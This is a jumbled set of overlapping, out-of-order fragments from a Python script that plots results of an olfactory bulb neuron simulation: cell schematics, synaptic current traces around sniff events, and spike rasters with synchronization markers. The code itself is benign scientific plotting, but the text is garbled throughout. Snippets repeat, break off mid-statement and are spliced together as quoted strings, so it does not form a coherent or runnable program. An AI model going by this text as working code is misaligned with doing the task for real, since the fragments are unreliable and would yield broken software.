schematic_ax.text(.025,", "= numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.))", "import os import numpy from matplotlib import pyplot from neuronpy.graphics import spikeplot from", "1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 = numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt)", "i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx =", "gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False)", "= syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt =", "1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events:", "pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20, cluster_width, 1, pair)", "ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc =", "in range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1],", "i in mask_b: if i == 1: if comp[idx] >= xlim[0] and comp[idx]", "ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\", "data.append([]) for m in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path,", "= syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", 
linewidth=2) )", "== 1: if comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \\", "numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\ color=color, linewidth=0.) # Glom ax.plot([xloc],", "onto blue'], \\ bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode=\"expand\", \\ borderaxespad=0., handletextpad=.2)", "\\ horizontalalignment='left', verticalalignment='center') # Mark delay interval for i in range(len(breath_events)): if breath_events[i]", "= BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays = read_delayevents()", "- 250 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval", "\\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(breath_events[i]+7.5, .28, \\ 'delay 0-15 ms', \\ horizontalalignment='center', verticalalignment='top',", "color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray',", "os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for cellid in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts)", "= syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) )", "verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center',", "if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\", "mode=\"expand\", \\ borderaxespad=0., handletextpad=.2) # Mark sniff interval for i in range(len(breath_events)): 
if", "= numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax =", "gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5,", "\\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes =", "2011 @author: - \"\"\" import os import numpy from matplotlib import pyplot from", "fig.add_axes([.1,.85,.8,.1]) syn_ax = fig.add_axes([.1,.45,.8,.225]) draw_cell(pair[0], schematic_ax, color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black')", "spiketrain from params import sim_var homedir = os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax,", "tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:]", "= syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC", "markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax):", "\\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left',", "BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = 
read_weightevents() delays = read_delayevents() dt", "sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\", "cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b, ratio", "sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2,", "data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width,", "m in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data", "from matplotlib import pyplot from neuronpy.graphics import spikeplot from bulbspikes import * from", "verticalalignment='center') # Mark delay interval for i in range(len(breath_events)): if breath_events[i] > 1400:", "label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a, mask_b,", "cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)): if wts[i]", "from neuronpy.graphics import spikeplot from bulbspikes import * from neuronpy.util import spiketrain from", "for m in M: data[int(m[0])].append(m[1]) return data def read_delayevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt'))", "read_weightevents(): M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in range(5): data.append([])", "-*- \"\"\" Created on Sun Mar 6 18:22:04 2011 @author: - 
\"\"\" import", "= sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)): if wts[i] > 0.0001:", "range(len(breath_events)): if breath_events[i] > xlim[0]: span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data', xytext=(breath_events[i+1], .28),", "sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red') sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \\ draw=False) coincidences, mask_a,", "raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1], fi)) fig.savefig(os.path.join(analysis_path,", "'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1], fi)) fig.savefig(os.path.join(analysis_path, 'fig1.pdf')) raster()", "gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks =", "blueplt = syn_ax.plot(x,y1, color='blue') for breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2],", "label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5) sp.set_markercolor('blue') sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \\ draw=False) sp.set_markercolor('red')", "numpy.zeros(tstop/dt) y1 = numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for", "if b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx", "onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto red',", "homedir def format_axes(ax, dt=1, ylim=(0.,4.)): 
#ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5))", "draw_weights(pair, schematic_ax, color='black') # Analyze an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop'])", "0-15 ms', \\ horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]]", "numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events: if b >= tstop: break", "arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150 - 250 ms', \\ horizontalalignment='center',", "breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5), \\ textcoords='data',", "color='purple', fontweight='bold', \\ horizontalalignment='center', verticalalignment='center') #raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue') idx += 1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)',", "label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \\ draw=False) sp.set_markerscale(1.3) sp.set_markeredgewidth(1.5)", "horizontalalignment='center', verticalalignment='top', \\ backgroundcolor='white') break # Mark amplitude interval span = syn_ax.annotate('', xy=(1190,", "span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2)", "mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 #", "marker='o', color='red') # idx += 1 idx = 0 for i in mask_b:", "= 10+pair[1]*20 gcright = 
gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp],", "syn_ax.legend([breathplt, redplt, blueplt], \\ ['sniff event', 'input onto red', 'input onto blue'], \\", "range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17, .5),", "raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5) for", "ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc", "markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7,", "breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule", "verticalalignment='top', \\ backgroundcolor='white') break spikes = bulb_spikes.get_mitral_spikes() ref=spikes[pair[0]] comp=spikes[pair[1]] gcspikes = bulb_spikes.get_granule_spikes() mididx", "mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp", "y = numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101),", "= bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = 
gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright =", "= homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.)", "i == 1: if comp[idx] >= xlim[0] and comp[idx] < xlim[1]: raster_ax.text(comp[idx],cluster_width*2+8.5, '*',", "in cellids: wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)): if", "granule cells\"\"\" import synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], \\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir,", "\"\"\" Created on Sun Mar 6 18:22:04 2011 @author: - \"\"\" import os", "markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100))", "+= 1 redplt = syn_ax.plot(x,y0, color='red') blueplt = syn_ax.plot(x,y1, color='blue') for breath in", "yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc],", "= \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0 # for i in", "gcspikes = bulb_spikes.get_granule_spikes() mididx = 10+pair[0]*20 gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] mididx = 10+pair[1]*20 gcright", "#ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim = ax.get_xlim() timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) 
ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization", "markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax) def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in", "delay interval for i in range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('',", "color='red') draw_cell(pair[1], schematic_ax, color='blue') draw_weights(pair, schematic_ax, color='black') # Analyze an output file in", "wts = sws.m2g[cellid,:,0] wts = wts/numpy.max(wts) for i in range(len(wts)): if wts[i] >", "amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\", "mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position()", "bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt')) wts = read_weightevents() delays =", "= read_delayevents() dt = 1 tstop = xlim[1] x = numpy.arange(0,tstop,dt) y0 =", "= (0.5, cluster_width*2+7.5) for breath in breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray',", "fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2 = (10+pair[1]*20,", "M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt')) data = [] for i in range(5): data.append([]) for", "linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', 
horizontalalignment='center') pos", "[10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.set_yticks([]) ax.spines['top'].set_color('none') ax.spines['bottom'].set_color('black') ax.xaxis.set_ticks_position('bottom')", "ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25)", "def format_schematic_axis(ax): ax.set_xlim((0,100)) xticks = [10,30,50,70,90] ax.set_xticks(xticks) ax.set_xticklabels(numpy.multiply(xticks,10)) ax.set_xlabel('distance in microns') ax.set_ylim((-5,11)) ax.spines['left'].set_color('none')", "M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt')) data = [] for i in range(5): data.append([]) for", "numpy.abs(numpy.subtract(range(101), xloc)) yvec = numpy.log(numpy.add(y,1)) ax.plot(range(101), yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec,", "for i in range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5),", "0 # for i in mask_a: # if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9],", "1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\", "output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position() schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos", "\\ ['sniff event', 'input onto red', 'input onto blue'], \\ bbox_to_anchor=(0, 1.15, 1.,", "ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'): xloc = 10+cellid*20 # Lateral dends", "10+pair[1]*20 gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1] sp = 
spikeplot.SpikePlot(fig=fig, savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) sp.set_markerscale(4) sp.plot_spikes([comp], label='comp',", "in range(len(breath_events)): if breath_events[i] > 1400: span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data', xytext=(breath_events[i]+17,", "m in M: data[int(m[0])].append(m[1]) return data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1", "# Mark amplitude interval span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data', xytext=(1190, 1.12), \\", "-*- coding: utf-8 -*- \"\"\" Created on Sun Mar 6 18:22:04 2011 @author:", "breath_events: raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike", "Glom ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9,", "idx = 0 for i in mask_b: if i == 1: if comp[idx]", "transform=fig.transFigure, verticalalignment='baseline') pos = raster_ax.get_position() raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure, verticalalignment='baseline') # fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf')", "breath_events: if b >= tstop: break else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx]", "pos2 = (10+pair[1]*20, cluster_width, 1, pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7))", "if i == 1: # raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red') # idx += 1 idx", "linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt, redplt, blueplt],", "synweightsnapshot sws = synweightsnapshot.SynWeightSnapshot( \\ nummit=sim_var['num_mitral'], 
\\ numgran=sim_var['num_granule']) raw=sws.read_file(sim_var['wt_input_file'], os.path.join(homedir, sim_var['weight_dir'])) sws.parse_data(raw) for", "timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.) ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5)) ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int)) ax.set_xlabel('lag (ms)') ax.set_ylim(ylim) ax.set_ylabel('Synchronization magnitude') def draw_cell(cellid, ax, color='black'):", "\\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([]) syn_ax.set_xticks([]) syn_ax.set_ylabel('EPSC onto tuft') leg = syn_ax.legend([breathplt,", "raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2", "stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax = fig.add_axes([.1,.85,.8,.1]) syn_ax", "xycoords='data', xytext=(1190, 1.12), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/-", "data def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair)", "an output file in some_dir bulb_spikes = BulbSpikes(sim_time=sim_var['tstop']) bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk')) breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt'))", "wts/numpy.max(wts) for i in range(len(wts)): if wts[i] > 0.0001: cellloc = 10+cellid*20 y", "= numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b in", "if wts[i] > 0.0001: cellloc = 10+cellid*20 y = numpy.abs(i - cellloc) yloc", "pair) # stim_odor_mags = numpy.ones(5)*.55 fig = pyplot.figure(figsize=(9.5,5.7)) raster_ax = fig.add_axes([.1,.1,.8,.27]) schematic_ax =", "10+cellid*20 y = numpy.abs(i - cellloc) yloc = numpy.log(numpy.add(y,1)) gloc = -3.5+((i%2)*1.5) ax.plot([i],[yloc],", 
"marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color) ax.plot([i,i],[yloc, gloc], color=color) ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color) format_schematic_axis(ax)", "linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n', horizontalalignment='center') pos = schematic_ax.get_position()", "1 raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \\ horizontalalignment='center', verticalalignment='center', fontsize=11) raster_ax.set_yticks([]) ylim = (0.5, cluster_width*2+7.5)", "else: dtidx = int((b+delays[pair[0]][idx])/dt) y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx] dtidx = int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx]", "os.path.join(os.path.relpath('..')) analysis_path = homedir def format_axes(ax, dt=1, ylim=(0.,4.)): #ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.)) #ax.set_xticklabels(['$-\\pi$','$-\\pi/2$','$0$','$\\pi/2$','$\\pi$'], fontsize=18) xlim =", "cluster_width=5, fi=.005, xlim=(1000,2000)): # pos1 = (10+pair[0]*20, cluster_width, 1, pair) # pos2 =", "@author: - \"\"\" import os import numpy from matplotlib import pyplot from neuronpy.graphics", "alpha=0.25) ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2) # Primary dendrite ax.plot([xloc, xloc], [0,8],", "markersize=10, markerfacecolor='white', markeredgecolor=color) ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25) ax.plot([xloc], [9], color=color, marker='1',", "numpy.zeros(tstop/dt) EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \\ numpy.multiply(x,-1./20.)) idx = 0 for b in breath_events:", "savefig=False) sp.set_markercolor('blue') sp.set_markeredgewidth(2.) 
sp.set_markerscale(4) sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \\ draw=False ) sp.set_markercolor('red') sp.plot_spikes([ref], label='ref',", "breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2) syn_ax.set_xlim(xlim) syn_ax.set_ylim(0,1.6) syn_ax.set_yticks([])", "for i in mask_b: if i == 1: if comp[idx] >= xlim[0] and", "xytext=(breath_events[i+1], .28), \\ textcoords='data', \\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \\ 'sniff every\\n150", ") syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') # Mark delay interval", "schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure, verticalalignment='baseline') pos = syn_ax.get_position() syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure, verticalalignment='baseline')", "[ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2) sp.update_xlim(xlim) raster_ax.set_ylim(ylim) raster_ax.set_xlabel('time (ms)') raster_ax.set_ylabel('spike output\\n granule mitral\\n\\n',", "Mar 6 18:22:04 2011 @author: - \"\"\" import os import numpy from matplotlib", "for breath in breath_events: breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \\ color='gray', linewidth=2)", "\\ arrowprops=dict(arrowstyle=\"|-|\", linewidth=2) ) syn_ax.text(1215, 1.21, \\ '+/- 5%', \\ horizontalalignment='left', verticalalignment='center') #", "yvec, color=color) # Soma ax.fill_between(range(101), numpy.ones(101), yvec, \\ where=numpy.ma.masked_where(yvec < 1., yvec).mask, \\", "coincidences, mask_a, mask_b, ratio = \\ spiketrain.get_sync_traits(ref, comp, window=5) # idx = 0", "= int((b+delays[pair[1]][idx])/dt) y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx] idx += 1 redplt = syn_ax.plot(x,y0, color='red') blueplt", "def draw_weights(cellids, ax, color='black',scale=1.): \"\"\"Draw granule cells\"\"\" import 
